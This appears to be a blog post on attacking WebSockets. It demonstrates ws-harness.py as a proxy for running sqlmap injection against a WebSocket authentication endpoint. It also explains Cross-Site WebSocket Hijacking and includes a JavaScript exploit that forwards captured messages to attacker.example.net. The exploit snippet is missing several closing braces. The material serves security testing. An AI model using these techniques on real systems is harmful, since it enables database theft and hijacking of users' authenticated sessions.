Web Sockets

Posted by
The WebSocket API is an advanced technology that makes it possible to open a two-way interactive communication session between the user’s browser and a server. With this API, you can send messages to a server and receive event-driven responses without having to poll the server for a reply.



Using ws-harness.py

Start ws-harness to listen on a web socket, and specify a message template to send to the endpoint.

python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt

The content of the message should contain the [FUZZ] keyword.

{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}

Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly with the content of messages sent thru the WebSocket.

sqlmap -u --tables --tamper=base64encode --dump

Cross-Site WebSocket Hijacking (CSWSH)

If the WebSocket handshake is not correctly protected using a CSRF token or a nonce, it’s possible to use the authenticated WebSocket of a user on an attacker’s controlled site because the cookies are automatically sent by the browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH).

Example exploit, hosted on an attacker’s server, that exfiltrates the received data from the WebSocket to the attacker:

  ws = new WebSocket('wss://vulnerable.example.com/messages');
  ws.onopen = function start(event) {
  ws.onmessage = function handleReply(event) {
    fetch('https://attacker.example.net/?'+event.data, {mode: 'no-cors'});
  ws.send("Some text sent to the server");

You have to adjust the code to your exact situation. E.g. if your web application uses a Sec-WebSocket-Protocol header in the handshake request, you have to add this value as a 2nd parameter to the WebSocket function call in order to add this header.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.